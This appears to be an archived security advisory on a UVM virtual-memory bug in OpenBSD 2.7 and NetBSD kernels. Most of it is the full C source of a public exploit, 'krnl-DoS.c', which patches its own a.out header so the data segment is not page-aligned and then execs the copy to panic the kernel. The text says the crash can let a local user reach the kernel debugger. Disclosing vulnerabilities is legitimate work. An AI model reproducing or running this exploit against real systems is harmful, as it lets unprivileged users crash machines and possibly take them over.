COMMAND

    kernel

SYSTEMS AFFECTED

    OpenBSD 2.7, NetBSD

PROBLEM

    An anonymous source found the following.  UVM is a new virtual memory
    system which is currently used in OpenBSD.  It is significantly
    better than the traditional Mach-based VM.

    The bug exists in the anonymous mapping code in UVM.  This bug
    allows any local user (or remote user) to crash the entire OpenBSD
    system, rendering it completely useless.  Once the system has
    crashed, a local user (with access to the terminal) may in fact hack
    the system, because the system drops into DDB (see the ddb manual
    page), which allows debugging of the actual kernel.

    Basically, if (sz & (PAGE_SIZE-1)) is nonzero, i.e. the mapping size
    is not a multiple of the page size, the kernel panic()'s.  Here is
    the xploit:

    // PUBLIC RELEASE
    //
    // krnl-DoS.c by RLoxley of Team Hackphreak (#hackphreak on unet) & SSG
    //
    // This exploit is proof of concept code. It exploits the UVM bug in
    // all OpenBSD kernels. It can also be used to gain god access via
    // ddb during the crash recovery phase of OpenBSD's security structure.
    //
    // Greets: #hackphreak, RootShellHackers, ZSH (#!/bin/zsh), EHAP,
    //         Condemnation, caddis[TESO], Solar Designer, gov-boi,
    //         #darknet, ISS, #conf, Al Hugher, Aleph1, shinex (for porting)
    //	   SSG, www.subterrain.net
    //
    // PS: The exploit is broke very slightly, so this takes some knowledge
    //
    // PUBLIC RELEASE
    
    
    #include <stdio.h>
    #include <errno.h>
    #include <stdlib.h>
    #include <string.h>
    #include <unistd.h>
    #include <a.out.h>
    #include <fcntl.h>
    #include <sys/types.h>
    
    /*
     * Path of the modified copy of this executable that main() writes out
     * and then exec's.  main() unlink()s this path first, so an existing
     * file of that name in the current directory is removed.  From a
     * detection standpoint this on-disk artifact (a near-copy of the
     * running binary with a patched a.out header) is the observable trace.
     */
    #define CRASH_FILE "./f0rKb0mB"
    
    /*
     * errno is already made available by <errno.h> above; this explicit
     * declaration is redundant and, on libcs where errno is a macro, may
     * not compile.  Left as in the original listing.
     */
    extern int      errno;
    
    /*
     * Entry point.  Reads the program's own executable image (argv[0]),
     * overlays an a.out `struct exec` header on the start of the buffer,
     * adds 3 to the header's a_data field so the data segment size is no
     * longer page-aligned (the condition the advisory above describes as
     * (sz & (PAGE_SIZE-1)) being nonzero), writes the modified image to
     * CRASH_FILE and exec's it.  Every error path exit()s with -1.
     *
     * Returns 0 only if execlp() returns, which happens only on failure;
     * on success the process image is replaced and main() never returns.
     */
    int
    main(int argc, char *argv[])
    {
    struct exec    *ehdr;      /* a.out header overlaid on the image buffer */
    struct stat     statbuf;   /* size of the image, from fstat() */
    int             fd;        /* reused: first argv[0], then CRASH_FILE */
    unsigned char  *data;      /* heap copy of the whole executable image */
    
    
       /* Open the running program's own file by the name it was invoked as. */
       fd = open(argv[0], O_RDONLY);
       if (fd < 0)
       {
    perror("main() : open(argv[0]) ");
    exit(-1);
       }
    
       if (fstat(fd, &statbuf) < 0)
       {
    perror("main() : fstat() ");
    exit(-1);
       }
    
       /* One buffer sized to the whole file; never freed (exec/exit follow). */
       data = (unsigned char *) malloc(statbuf.st_size);
       if (data == NULL)
       {
    perror("main() : malloc() ");
    exit(-1);
       }
    
       /*
        * Only a failed (-1) or empty (0) read is rejected; a short read is
        * not detected, so the image may be incomplete on unusual filesystems.
        */
       if (read(fd, data, statbuf.st_size) <= 0)
       {
    puts("main() : read() Failure");
    exit(-1);
       }
    
       /*
        * Treat the first bytes of the image as the a.out header.  No check
        * is made that the file is at least sizeof *ehdr long or that the
        * magic number is valid; the listing assumes argv[0] is an a.out binary.
        */
       ehdr = (struct exec *) data;
    
       close(fd);
    
       /* Remove any stale copy so O_CREAT below starts from an empty file. */
       unlink(CRASH_FILE);
    
       /* Created with mode S_IXUSR only (owner execute, no read/write bits). */
       fd = open(CRASH_FILE, O_RDWR | O_CREAT, S_IXUSR);
       if (fd < 0)
       {
    perror("main() : open(CRASH_FILE) ");
    exit(-1);
       }
    
       /*
        * The only modification: bump the data-segment size by 3 bytes.
        * This makes a_data not a multiple of the page size, which is the
        * condition the advisory text identifies as the panic trigger.
        */
       ehdr->a_data += 3;
    
       /* Like read() above, only a failed write is caught, not a short one. */
       if (write(fd, data, statbuf.st_size) < 0)
       {
    perror("main() : write() ");
    exit(-1);
       }
    
       close(fd);
    
       /*
        * Exec the patched copy.  Note the argument list passed is empty
        * (NULL as the first variadic argument, so no argv[0]); execlp()
        * returns only on failure.
        */
       if (execlp(CRASH_FILE, NULL) < 0)
       {
    perror("main() : execlp() ");
    exit(-1);
       }
    
       return (0);
    }

SOLUTION

    There is a patch.